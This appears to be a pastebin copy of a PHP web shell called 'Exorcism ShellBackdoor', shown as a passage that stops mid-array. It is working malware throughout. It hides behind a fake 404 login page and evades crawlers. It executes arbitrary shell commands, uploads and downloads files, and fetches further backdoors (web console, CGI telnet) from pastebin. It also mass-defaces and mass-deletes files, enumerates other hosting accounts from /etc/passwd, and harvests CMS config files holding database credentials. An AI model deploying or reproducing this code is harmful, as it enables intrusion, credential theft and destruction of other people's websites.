· 7 years ago · Dec 29, 2018, 04:42 PM
1<?php
2session_start();
3@error_reporting(0);
4@set_time_limit(0);
5
6if(version_compare(PHP_VERSION, '5.3.0', '<')) {
7 @set_magic_quotes_runtime(0);
8}
9
10@clearstatcache();
11@ini_set('error_log',NULL);
12@ini_set('log_errors',0);
13@ini_set('max_execution_time',0);
14@ini_set('output_buffering',0);
15@ini_set('display_errors', 0);
16
17$password = "2c64ffd34da8c270de00d2a35fd136d7";
18
19$SERVERIP = (!$_SERVER['SERVER_ADDR']) ? gethostbyname($_SERVER['HTTP_HOST']) : $_SERVER['SERVER_ADDR'];
20$FILEPATH = str_replace($_SERVER['DOCUMENT_ROOT'], "", path());
21
22if(!empty($_SERVER['HTTP_USER_AGENT'])) {
23 $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot", "curl");
24 if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
25 header('HTTP/1.0 404 Not Found');
26 exit;
27 }
28}
29
30function login_shell() {
31?>
32<!DOCTYPE HTML>
33<html>
34<head>
35<title>404 Not Found</title>
36<h1>Not Found</h1>
37
38<p>The requested URL was not found on this server.</p>
39<p>Additionally, a 404 Not Found
40error was encountered while trying to use an ErrorDocument to handle the request.</p>
41<hr>
42<address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>
43 <style>
44 input { margin:0;background-color:#fff;border:1px solid #fff;text-align: center; }
45 </style>
46 <br><br><br><br><br>
47<form method="post"><center>
48<input type="password" name="password">
49</form></center>
50<?php
51exit;
52}
53
54if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
55 if(empty($password) || (isset($_POST['password']) && (md5($_POST['password']) == $password)))
56 $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
57 else
58 login_shell();
59
60if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
61 @ob_clean();
62 $file = $_GET['file'];
63 header('Content-Description: File Transfer');
64 header('Content-Type: application/octet-stream');
65 header('Content-Disposition: attachment; filename="'.basename($file).'"');
66 header('Expires: 0');
67 header('Cache-Control: must-revalidate');
68 header('Pragma: public');
69 header('Content-Length: ' . filesize($file));
70 readfile($file);
71 exit;
72}
73
74if(get_magic_quotes_gpc()) {
75 function idx_ss($array) {
76 return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
77 }
78 $_POST = idx_ss($_POST);
79}
80?>
81<!DOCTYPE HTML>
82<html>
83<head>
84<title>ҳ̸Ҳ̸ҳ Exorcism ҳ̸Ҳ̸ҳ</title>
85<meta name='author' content='./Exorcism'>
86<meta charset="UTF-8">
87<script type="text/javascript">function tukar(b,a){document.getElementById(b).style.display="none";document.getElementById(a).style.display="block"};</script>
88 <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
89 <script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
90 <link href="https://fonts.googleapis.com/css?family=Jua" rel="stylesheet">
91 <link href="https://fonts.googleapis.com/css?family=Ubuntu" rel="stylesheet">
92 <link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'>
93 <link rel="icon" type="image/png" href="https://2.bp.blogspot.com/-oik4nkMXXfY/WuNKN-IjunI/AAAAAAAAAqE/J-jUyiHilo02nLQ1yfIucJ-abP85eTqawCLcBGAs/s320/nw.png">
94<style type='text/css'>
95@import url(https://fonts.googleapis.com/css?family=Ubuntu);
96html {
97background:#000;
98background-image:url("https://i.imgur.com/wfkcPA4.jpg");
99background-position:top center;
100background-attachment:fixed;
101background-size:cover;
102background-repeat:no-repeat;
103margin: 0px;
104
105 color: #04FFD9;
106 font-family: 'Ubuntu';
107 font-size: 14px;
108 width: 100%;
109}
110.content{
111 width:100%; text-decoration:none; color:#b3eeff;
112 border:1px solid #04FFD9;
113}
114textarea {
115 border: 2px solid #00F0FF;
116 width: 70%;
117 height: 200px;
118 padding-left: 5px;
119 margin: 10px auto;
120 resize: none;
121 background: transparent;
122 color: #ffffff;
123 font-family: 'Ubuntu';
124 font-size: 13px;
125}
126select {
127 width: 152px;
128 background: transparent;
129 color: #FF4E00;
130 border: 1px solid #333;
131 margin: 5px;
132 padding: 4px;
133 padding-left: 5px;
134 font-family: 'Ubuntu';
135 font-size: 13px;
136}
137
138li {
139 display: inline;
140 margin: 5px;
141
142}
143ul a {
144 color: #00F0FF;
145 background: #333;
146 margin: -2px;
147 padding: 6px;
148 border-radius: 4px;
149 font-family: 'Ubuntu';
150}
151ul a:hover {
152 opacity : 5.4;
153 text-decoration: none;
154 background: #999;
155}
156a {
157 color: #FF9000;
158 text-decoration: none;
159}
160
161a:hover {
162 text-decoration: underline;
163}
164
165b {
166 color: gold;
167}
168
169pre {
170 font-size: 15px;
171}
172
173table, th, td {
174 border-collapse:collapse;
175 background: transparent;
176 font-family: 'Ubuntu';
177 font-size: 13px;
178}
179
180.table_home, .th_home, .td_home {
181 border: 1px solid #00F0FF;
182 font-family: 'Ubuntu';
183}
184
185.th_home {
186 background: #262626;
187 color: lightblue;
188 padding:10px;
189}
190
191.td_home, .td_home > a {
192 color: #ffffff;
193}
194
195.td_home > a:hover {
196 color: gold;
197}
198th {
199 padding: 10px;
200}
201th {
202 font-weight: bold;
203 text-align: center;
204}
205td, th {
206 display: table-cell;
207 vertical-align: inherit;
208}
209
210tr:hover {
211 opacity : 1;
212 background: #414141;
213}
214
215input[type=text], input[type=password], .input {
216 background: transparent;
217 color: #00F0FF;
218 border: 1px solid #00F0FF;
219 padding: 3px;
220 font-family: 'Ubuntu';
221 font-size: 13px;
222}
223
224input[type=text], input[type=password], input[type=submit], input[type=file] {
225 background: transparent;
226 color: #00F0FF;
227 border: 2px solid #333;
228 margin: 0px;
229 padding-left: 5px;
230 font-family: 'Ubuntu';
231 font-size: 13px;
232}
233
234input:focus, textarea:focus {
235 outline: 0;
236 border-color: #00F0FF;
237}
238
239textarea {
240
241 border: 2px solid #00F0FF;
242 width: 70%;
243 height: 200px;
244 padding-left: 5px;
245 margin: 10px auto;
246 resize: none;
247 background: transparent;
248 color: #ffffff;
249 font-family: 'Ubuntu';
250 font-size: 13px;
251}
252iframe {
253 width: 100%;
254 min-height: 500px;
255}
256.kedip {
257 animation-name: blinker;
258 animation-duration: 3s;
259 animation-timing-function: linear;
260 animation-iteration-count: infinite;
261 color:aqua;
262}
263
264@-moz-keyframes blinker {
265 0% { opacity: 1.0; }
266 50% { opacity: 0.0; }
267 100% { opacity: 1.0; }
268 }
269
270@-webkit-keyframes blinker {
271 0% { opacity: 1.0; }
272 50% { opacity: 0.0; }
273 100% { opacity: 1.0; }
274 }
275
276@keyframes blinker {
277 0% { opacity: 1.0; }
278 50% { opacity: 0.0; }
279 100% { opacity: 1.0; }
280 }
281</style>
282</head>
283<body>
284<?php
285function path() {
286 if(isset($_GET['dir'])) {
287 $dir = str_replace("\\", "/", $_GET['dir']);
288 @chdir($dir);
289 } else {
290 $dir = str_replace("\\", "/", getcwd());
291 }
292 return $dir;
293}
294
295function color($bold = 1, $colorid = null, $string = null) {
296 $color = array(
297 "</font>", # 0 off
298 "<font color='red'>", # 1 red
299 "<font color='lime'>", # 2 lime
300 "<font color='white'>", # 3 white
301 "<font color='gold'>", # 4 gold
302 );
303
304 return ($string !== null) ? $color[$colorid].$string.$color[0]: $color[$colorid];
305}
306
307function OS() {
308 return (substr(strtoupper(PHP_OS), 0, 3) === "WIN") ? "Windows" : "Linux";
309}
310
311function exe($cmd) {
312 if(function_exists('system')) {
313 @ob_start();
314 @system($cmd);
315 $buff = @ob_get_contents();
316 @ob_end_clean();
317 return $buff;
318 } elseif(function_exists('exec')) {
319 @exec($cmd,$results);
320 $buff = "";
321 foreach($results as $result) {
322 $buff .= $result;
323 } return $buff;
324 } elseif(function_exists('passthru')) {
325 @ob_start();
326 @passthru($cmd);
327 $buff = @ob_get_contents();
328 @ob_end_clean();
329 return $buff;
330 } elseif(function_exists('shell_exec')) {
331 $buff = @shell_exec($cmd);
332 return $buff;
333 }
334}
335
336function save($filename, $mode, $file) {
337 $handle = fopen($filename, $mode);
338 fwrite($handle, $file);
339 fclose($handle);
340 return;
341}
342
343function getfile($name) {
344 if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't spawn $name."));
345 if($name === "adminer") $get = array("https://www.adminer.org/static/download/4.3.1/adminer-4.3.1.php", "adminer.php");
346 elseif($name === "webconsole") $get = array("https://pastebin.com/raw/2i96fDCN", "webconsole.php");
347 elseif($name === "cgitelnet1") $get = array("https://pastebin.com/raw/Lj46KxFT", "idx_cgi/cgitelnet1.idx");
348 elseif($name === "cgitelnet2") $get = array("https://pastebin.com/raw/aKL2QWfS", "idx_cgi/cgitelnet2.idx");
349 elseif($name === "LRE") $get = array("https://pastebin.com/raw/PVPfA21i", "makman.php");
350
351 $fp = fopen($get[1], "w");
352 $ch = curl_init();
353 curl_setopt($ch, CURLOPT_URL, $get[0]);
354 curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
355 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
356 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
357 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
358 curl_setopt($ch, CURLOPT_FILE, $fp);
359 return curl_exec($ch);
360 curl_close($ch);
361 fclose($fp);
362 ob_flush();
363 flush();
364}
365
366function usergroup() {
367 if(!function_exists('posix_getegid')) {
368 $user['name'] = @get_current_user();
369 $user['uid'] = @getmyuid();
370 $user['gid'] = @getmygid();
371 $user['group'] = "?";
372 } else {
373 $user['uid'] = @posix_getpwuid(posix_geteuid());
374 $user['gid'] = @posix_getgrgid(posix_getegid());
375 $user['name'] = $user['uid']['name'];
376 $user['uid'] = $user['uid']['uid'];
377 $user['group'] = $user['gid']['name'];
378 $user['gid'] = $user['gid']['gid'];
379 }
380 return (object) $user;
381}
382
383function getuser() {
384 $fopen = fopen("/etc/passwd", "r") or die(color(1, 1, "Can't read /etc/passwd"));
385 while($read = fgets($fopen)) {
386 preg_match_all('/(.*?):x:/', $read, $getuser);
387 $user[] = $getuser[1][0];
388 }
389 return $user;
390}
391
392function getdomainname() {
393 $fopen = fopen("/etc/named.conf", "r");
394 while($read = fgets($fopen)) {
395 preg_match_all("#/var/named/(.*?).db#", $read, $getdomain);
396 $domain[] = $getdomain[1][0];
397 }
398 return $domain;
399}
400
401function hddsize($size) {
402 if($size >= 1073741824)
403 return sprintf('%1.2f',$size / 1073741824 ).' GB';
404 elseif($size >= 1048576)
405 return sprintf('%1.2f',$size / 1048576 ) .' MB';
406 elseif($size >= 1024)
407 return sprintf('%1.2f',$size / 1024 ) .' KB';
408 else
409 return $size .' B';
410}
411
412function hdd() {
413 $hdd['size'] = hddsize(disk_total_space("/"));
414 $hdd['free'] = hddsize(disk_free_space("/"));
415 $hdd['used'] = hddsize(disk_total_space("/") - disk_free_space("/"));
416 return (object) $hdd;
417}
418
419function writeable($path, $perms) {
420 return (!is_writable($path)) ? color(1, 1, $perms) : color(1, 2, $perms);
421}
422
423function perms($path) {
424 $perms = fileperms($path);
425 if (($perms & 0xC000) == 0xC000) {
426 // Socket
427 $info = 's';
428 }
429 elseif (($perms & 0xA000) == 0xA000) {
430 // Symbolic Link
431 $info = 'l';
432 }
433 elseif (($perms & 0x8000) == 0x8000) {
434 // Regular
435 $info = '-';
436 }
437 elseif (($perms & 0x6000) == 0x6000) {
438 // Block special
439 $info = 'b';
440 }
441 elseif (($perms & 0x4000) == 0x4000) {
442 // Directory
443 $info = 'd';
444 }
445 elseif (($perms & 0x2000) == 0x2000) {
446 // Character special
447 $info = 'c';
448 }
449 elseif (($perms & 0x1000) == 0x1000) {
450 // FIFO pipe
451 $info = 'p';
452 }
453 else {
454 // Unknown
455 $info = 'u';
456 }
457 // Owner
458 $info .= (($perms & 0x0100) ? 'r' : '-');
459 $info .= (($perms & 0x0080) ? 'w' : '-');
460 $info .= (($perms & 0x0040) ?
461 (($perms & 0x0800) ? 's' : 'x' ) :
462 (($perms & 0x0800) ? 'S' : '-'));
463 // Group
464 $info .= (($perms & 0x0020) ? 'r' : '-');
465 $info .= (($perms & 0x0010) ? 'w' : '-');
466 $info .= (($perms & 0x0008) ?
467 (($perms & 0x0400) ? 's' : 'x' ) :
468 (($perms & 0x0400) ? 'S' : '-'));
469 // World
470 $info .= (($perms & 0x0004) ? 'r' : '-');
471 $info .= (($perms & 0x0002) ? 'w' : '-');
472 $info .= (($perms & 0x0001) ?
473 (($perms & 0x0200) ? 't' : 'x' ) :
474 (($perms & 0x0200) ? 'T' : '-'));
475
476 return $info;
477}
478
479function lib_installed() {
480 $lib[] = "MySQL: ".(function_exists('mysql_connect') ? color(1, 2, "ON") : color(1, 1, "OFF"));
481 $lib[] = "cURL: ".(function_exists('curl_version') ? color(1, 2, "ON") : color(1, 1, "OFF"));
482 $lib[] = "WGET: ".(exe('wget --help') ? color(1, 2, "ON") : color(1, 1, "OFF"));
483 $lib[] = "Perl: ".(exe('perl --help') ? color(1, 2, "ON") : color(1, 1, "OFF"));
484 $lib[] = "Python: ".(exe('python --help') ? color(1, 2, "ON") : color(1, 1, "OFF"));
485 return implode(" | ", $lib);
486}
487
488function pwd() {
489 $dir = explode("/", path());
490 foreach($dir as $key => $index) {
491 print "<a href='?dir=";
492 for($i = 0; $i <= $key; $i++) {
493 print $dir[$i];
494 if($i != $key) {
495 print "/";
496 }
497 }
498 print "'>$index</a>/";
499 }
500 print "<br>";
501 print (OS() === "Windows") ? windisk() : "";
502}
503
504function windisk() {
505 $letters = "";
506 $v = explode("\\", path());
507 $v = $v[0];
508 foreach(range("A", "Z") as $letter) {
509 $bool = $isdiskette = in_array($letter, array("A"));
510 if(!$bool) $bool = is_dir("$letter:\\");
511 if($bool) {
512 $letters .= "[ <a href='?dir=$letter:\\'".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">";
513 if($letter.":" != $v) {
514 $letters .= $letter;
515 }
516 else {
517 $letters .= color(1, 2, $letter);
518 }
519 $letters .= "</a> ]";
520 }
521 }
522 if(!empty($letters)) {
523 print "Detected Drives $letters<br>";
524 }
525 if(count($quicklaunch) > 0) {
526 foreach($quicklaunch as $item) {
527 $v = realpath(path(). "..");
528 if(empty($v)) {
529 $a = explode(DIRECTORY_SEPARATOR,path());
530 unset($a[count($a)-2]);
531 $v = join(DIRECTORY_SEPARATOR, $a);
532 }
533 print "<a href='".$item[1]."'>".$item[0]."</a>";
534 }
535 }
536}
537if($_POST['upload']) {
538 if($_POST['uploadtype'] === '1') {
539 if(@copy($_FILES['file']['tmp_name'], path().DIRECTORY_SEPARATOR.$_FILES['file']['name']."")) {
540 $act = color(1, 2, "Uploaded!")." at <i><b>".path().DIRECTORY_SEPARATOR.$_FILES['file']['name']."</b></i>";
541 }
542 else {
543 $act = color(1, 1, "Failed to upload file!");
544 }
545 }
546 elseif($_POST['uploadtype'] === '2') {
547 $root = $_SERVER['DOCUMENT_ROOT'].DIRECTORY_SEPARATOR.$_FILES['file']['name'];
548 $web = $_SERVER['HTTP_HOST'].DIRECTORY_SEPARATOR.$_FILES['file']['name'];
549 if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
550 if(@copy($_FILES['file']['tmp_name'], $root)) {
551 $act = color(1, 2, "Uploaded!")." at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
552 }
553 else {
554 $act = color(1, 1, "Failed to upload file!");
555 }
556 }
557 else {
558 $act = color(1, 1, "Failed to upload file!");
559 }
560 }
561 }
562echo "<center><font face=Iceland size=20px color: #FF9000 class='kedip'>Exorcism ShellBackdoor<br/></font><br>";
563echo " $act
564 <form method='post' enctype='multipart/form-data'>
565 <input type='radio' name='uploadtype' value='1' checked>Biasa [ ".writeable(path(), "Writeable")." ]
566 <input type='radio' name='uploadtype' value='2'>Home_Root [ ".writeable($_SERVER['DOCUMENT_ROOT'], "Writeable")." ]<br>
567 <input type='file' name='file'>
568 <input type='submit' value='upload' name='upload'>
569 </form></center>";
570
571echo "<hr color=#00F0FF>";
572function serverinfo() {
573 $disable_functions = @ini_get('disable_functions');
574 $disable_functions = (!empty($disable_functions)) ? color(1, 1, $disable_functions) : color(1, 2, "NONE");
575 $output[] = "SERVER IP : ".color(1, 2, $GLOBALS['SERVERIP'])." / YOUR IP ".color(1, 2, $_SERVER['REMOTE_ADDR']);
576 $output[] = "WEB SERVER : ".color(1, 2, $_SERVER['SERVER_SOFTWARE']);
577 $output[] = "SYSTEM : ".color(1, 2, php_uname());
578 $output[] = "USER / GROUP : ".color(1, 2, usergroup()->name)."(".color(1, 2 , usergroup()->uid).") / ".color(1, 2 , usergroup()->group)."(".color(1, 2 , usergroup()->gid).")";
579 $output[] = "HDD : ".color(1, 2, hdd()->used)." / ".color(1, 2 , hdd()->size)." (Free: ".color(1, 2 , hdd()->free).")";
580 $output[] = "Waktu Di Server : <font color=lime>".date("d M Y h:i:s a")."</font>";
581 $output[] = "PHP VERSION : ".color(1, 2, @phpversion());
582 $output[] = "SAFE MODE : ".(@ini_get(strtoupper("safe_mode")) === "ON" ? color(1, 2, "ON") : color(1, 2, "OFF"));
583 $output[] = "DISABLE FUNCTIONS : $disable_functions";
584 $output[] = lib_installed();
585 $output[] = "<hr color=#00F0FF><br>Sekarang Kita Berada Di (".writeable(path(), perms(path())).") ";
586
587 print "<pre>";
588 print implode("<br>", $output);
589 pwd();
590 print "</pre>";
591 echo '<center>';
592}
593
594function curl($url, $post = false, $data = null) {
595 $ch = curl_init($url);
596 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
597 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
598 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
599 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
600 curl_setopt($ch, CURLOPT_TIMEOUT, 10);
601 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
602 if($post) {
603 curl_setopt($ch, CURLOPT_POST, true);
604 curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
605 }
606 return curl_exec($ch);
607 curl_close($ch);
608}
609
610function reverse() {
611 $response = curl("http://domains.yougetsignal.com/domains.php", TRUE, "remoteAddress=".$GLOBALS['SERVERIP']."&ket=");
612 $response = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $response)))))))))))));
613 $explode = explode(",,", $response);
614 unset($explode[0]);
615
616 foreach($explode as $domain) {
617 $domain = "http://$domain";
618 $domain = str_replace(",", "", $domain);
619 $url[] = $domain;
620 ob_flush();
621 flush();
622 }
623
624 return $url;
625}
626
627function getValue($param, $kata1, $kata2){
628 if(strpos($param, $kata1) === FALSE) return FALSE;
629 if(strpos($param, $kata2) === FALSE) return FALSE;
630 $start = strpos($param, $kata1) + strlen($kata1);
631 $end = strpos($param, $kata2, $start);
632 $return = substr($param, $start, $end - $start);
633 return $return;
634}
635
636function massdeface($dir, $file, $filename, $type = null) {
637 $scandir = scandir($dir);
638 foreach($scandir as $dir_) {
639 $path = "$dir/$dir_";
640 $location = "$path/$filename";
641 if($dir_ === "." || $dir_ === "..") {
642 file_put_contents($location, $file);
643 }
644 else {
645 if(is_dir($path) AND is_writable($path)) {
646 print "[".color(1, 2, "DONE")."] ".color(1, 4, $location)."<br>";
647 file_put_contents($location, $file);
648 if($type === "-alldir") {
649 massdeface($path, $file, $filename, "-alldir");
650 }
651 }
652 }
653 }
654}
655
656function massdelete($dir, $filename) {
657 $scandir = scandir($dir);
658 foreach($scandir as $dir_) {
659 $path = "$dir/$dir_";
660 $location = "$path/$filename";
661 if($dir_ === '.') {
662 if(file_exists("$dir/$filename")) {
663 unlink("$dir/$filename");
664 }
665 }
666 elseif($dir_ === '..') {
667 if(file_exists(dirname($dir)."/$filename")) {
668 unlink(dirname($dir)."/$filename");
669 }
670 }
671 else {
672 if(is_dir($path) AND is_writable($path)) {
673 if(file_exists($location)) {
674 print "[".color(1, 2, "DELETED")."] ".color(1, 4, $location)."<br>";
675 unlink($location);
676 massdelete($path, $filename);
677 }
678 }
679 }
680 }
681}
682
683function tools($toolsname, $args = null) {
684 if($toolsname === "cmd") {
685 print "<form method='post' action='?do=cmd&dir=".path()."' style='margin-top: 15px;'>
686 ".usergroup()->name."@".$GLOBALS['SERVERIP'].": ~ $
687 <input style='border: none; border-bottom: 1px solid #ffffff;' type='text' name='cmd' required>
688 <input style='border: none; border-bottom: 1px solid #ffffff;' class='input' type='submit' value='>>'>
689 </form>";
690 }
691 elseif($toolsname === "readfile") {
692 if(empty($args)) die(color(1, 1, $msg));
693 if(!is_file($args)) die(color(1, 1, "File '$args' is not exists."));
694
695 print "<pre>";
696 print htmlspecialchars(file_get_contents($args));
697 print "</pre>";
698 }
699 elseif($toolsname === "spawn") {
700 if($args === "adminer") {
701 if(file_exists("adminer.php")) {
702 print "Login Adminer: <a href='".$GLOBALS['FILEPATH']."/adminer.php' target='_blank'>http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/adminer.php</a>";
703 }
704 else {
705 if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'Adminer'."));
706 if(getfile("adminer")) {
707 print "Login Adminer: <a href='".$GLOBALS['FILEPATH']."/adminer.php' target='_blank'>http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/adminer.php</a>";
708 }
709 else {
710 print color(1, 1, "Error while downloading file Adminer.");
711 @unlink("adminer.php");
712 }
713 }
714 }
715 elseif($args === "webconsole") {
716 if(file_exists("webconsole.php")) {
717 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/webconsole.php' frameborder='0' scrolling='yes'></iframe>";
718 }
719 else {
720 if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'WebConsole'."));
721 if(getfile("webconsole")) {
722 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/webconsole.php' frameborder='0' scrolling='yes'></iframe>";
723 }
724 else {
725 print color(1, 1, "Error while downloading file WebConsole.");
726 @unlink("webconsole.php");
727 }
728 }
729 }
730 elseif($args === "cgitelnet1") {
731 if(file_exists("idx_cgi/cgitelnet1.idx")) {
732 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_cgi/cgitelnet1.idx' frameborder='0' scrolling='yes'></iframe>";
733 }
734 elseif(file_exists('cgitelnet1.idx')) {
735 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/cgitelnet1.idx' frameborder='0' scrolling='yes'></iframe>";
736 }
737 else {
738 if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_cgi'."));
739 if(!is_dir(path()."/idx_cgi/")) {
740 @mkdir('idx_cgi', 0755);
741 save("idx_cgi/.htaccess", "w", "AddHandler cgi-script .idx");
742 }
743 if(getfile("cgitelnet1")) {
744 chmod('idx_cgi/cgitelnet1.idx', 0755);
745 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_cgi/cgitelnet1.idx' frameborder='0' scrolling='yes'></iframe>";
746 }
747 else {
748 print color(1, 1, "Error while downloading file CGI Telnet.");
749 @rmdir(path()."/idx_cgi/");
750 if(!@rmdir(path()."/idx_cgi/") AND OS() === "Linux") @exe("rm -rf ".path()."/idx_cgi/");
751 if(!@rmdir(path()."/idx_cgi/") AND OS() === "Windows") @exe("rmdir /s /q ".path()."/idx_cgi/");
752 }
753 }
754
755 }
756 elseif($args === "cgitelnet2") {
757 if(file_exists("idx_cgi/cgitelnet2.idx")) {
758 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_cgi/cgitelnet2.idx' frameborder='0' scrolling='yes'></iframe>";
759 }
760 elseif(file_exists('cgitelnet2.idx')) {
761 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/cgitelnet2.idx' frameborder='0' scrolling='no'></iframe>";
762 }
763 else {
764 if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_cgi'."));
765 if(!is_dir(path()."/idx_cgi/")) {
766 @mkdir('idx_cgi', 0755);
767 save("idx_cgi/.htaccess", "w", "AddHandler cgi-script .idx");
768 }
769 if(getfile("cgitelnet2")) {
770 chmod('idx_cgi/cgitelnet2.idx', 0755);
771 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_cgi/cgitelnet2.idx' frameborder='0' scrolling='yes'></iframe>";
772 }
773 else {
774 print color(1, 1, "Error while downloading file CGI Telnet.");
775 @rmdir(path()."/idx_cgi/");
776 if(!@rmdir(path()."/idx_cgi/") AND OS() === "Linux") @exe("rm -rf ".path()."/idx_cgi/");
777 if(!@rmdir(path()."/idx_cgi/") AND OS() === "Windows") @exe("rmdir /s /q ".path()."/idx_cgi/");
778 }
779 }
780
781 }
782 elseif($args === "phpinfo") {
783 if(file_exists('phpinfo.php') AND preg_match("/phpinfo()/", file_get_contents('phpinfo.php'))) {
784 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/phpinfo.php' frameborder='0' scrolling='yes'></iframe>";
785 }
786 else {
787 if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'phpinfo'."));
788 save("phpinfo.php", "w", "<?php print '<html><style>html,body {background: #000000;}</style><div style=\'background: #000000; color: #cccccc;\'>'; phpinfo(); print '</div></html>'; ?>");
789 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/phpinfo.php' frameborder='0' scrolling='yes'></iframe>";
790 }
791 }
792 }
793
794 elseif($toolsname === "jumping") {
795 $i = 0;
796 foreach(getuser() as $user) {
797 $path = "/home/$user/public_html";
798 if(is_readable($path)) {
799 $status = color(1, 2, "[R]");
800 if(is_writable($path)) {
801 $status = color(1, 2, "[RW]");
802 }
803 $i++;
804 print "$status <a href='?dir=$path'>".color(1, 4, $path)."</a>";
805 if(!function_exists('posix_getpwuid')) print "<br>";
806 if(!getdomainname()) print " => ".color(1, 1, "Can't get domain name")."<br>";
807 foreach(getdomainname() as $domain) {
808 $userdomain = (object) @posix_getpwuid(@fileowner("/etc/valiases/$domain"));
809 $userdomain = $userdomain->name;
810 if($userdomain === $user) {
811 print " => <a href='http://$domain/' target='_blank'>".color(1, 2, $domain)."</a><br>";
812 break;
813 }
814 }
815 }
816 }
817 print ($i === 0) ? "" : "<p>".color(1, 3, "Total ada $i kamar di ".$GLOBALS['SERVERIP'])."</p>";
818 }
819 elseif($toolsname === "idxconfig") {
820 if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_config'."));
821 if(!is_dir(path()."/idx_config/")) {
822 @mkdir('idx_config', 0755);
823 $htaccess = "Options all\nDirectoryIndex Exorcism.htm\nSatisfy Any";
824 save("idx_config/.htaccess","w", $htaccess);
825
826 foreach(getuser() as $user) {
827 $user_docroot = "/home/$user/public_html/";
828 if(is_readable($user_docroot)) {
829 $getconfig = array(
830 "/home/$user/.accesshash" => "WHM-accesshash",
831 "$user_docroot/config/koneksi.php" => "Lokomedia",
832 "$user_docroot/forum/config.php" => "phpBB",
833 "$user_docroot/sites/default/settings.php" => "Drupal",
834 "$user_docroot/config/settings.inc.php" => "PrestaShop",
835 "$user_docroot/app/etc/local.xml" => "Magento",
836 "$user_docroot/admin/config.php" => "OpenCart",
837 "$user_docroot/application/config/database.php" => "Ellislab",
838 "$user_docroot/vb/includes/config.php" => "Vbulletin",
839 "$user_docroot/includes/config.php" => "Vbulletin",
840 "$user_docroot/forum/includes/config.php" => "Vbulletin",
841 "$user_docroot/forums/includes/config.php" => "Vbulletin",
842 "$user_docroot/cc/includes/config.php" => "Vbulletin",
843 "$user_docroot/inc/config.php" => "MyBB",
844 "$user_docroot/includes/configure.php" => "OsCommerce",
845 "$user_docroot/shop/includes/configure.php" => "OsCommerce",
846 "$user_docroot/os/includes/configure.php" => "OsCommerce",
847 "$user_docroot/oscom/includes/configure.php" => "OsCommerce",
848 "$user_docroot/products/includes/configure.php" => "OsCommerce",
849 "$user_docroot/cart/includes/configure.php" => "OsCommerce",
850 "$user_docroot/inc/conf_global.php" => "IPB",
851 "$user_docroot/wp-config.php" => "Wordpress",
852 "$user_docroot/wp/test/wp-config.php" => "Wordpress",
853 "$user_docroot/blog/wp-config.php" => "Wordpress",
854 "$user_docroot/beta/wp-config.php" => "Wordpress",
855 "$user_docroot/portal/wp-config.php" => "Wordpress",
856 "$user_docroot/site/wp-config.php" => "Wordpress",
857 "$user_docroot/wp/wp-config.php" => "Wordpress",
858 "$user_docroot/WP/wp-config.php" => "Wordpress",
859 "$user_docroot/news/wp-config.php" => "Wordpress",
860 "$user_docroot/wordpress/wp-config.php" => "Wordpress",
861 "$user_docroot/test/wp-config.php" => "Wordpress",
862 "$user_docroot/demo/wp-config.php" => "Wordpress",
863 "$user_docroot/home/wp-config.php" => "Wordpress",
864 "$user_docroot/v1/wp-config.php" => "Wordpress",
865 "$user_docroot/v2/wp-config.php" => "Wordpress",
866 "$user_docroot/press/wp-config.php" => "Wordpress",
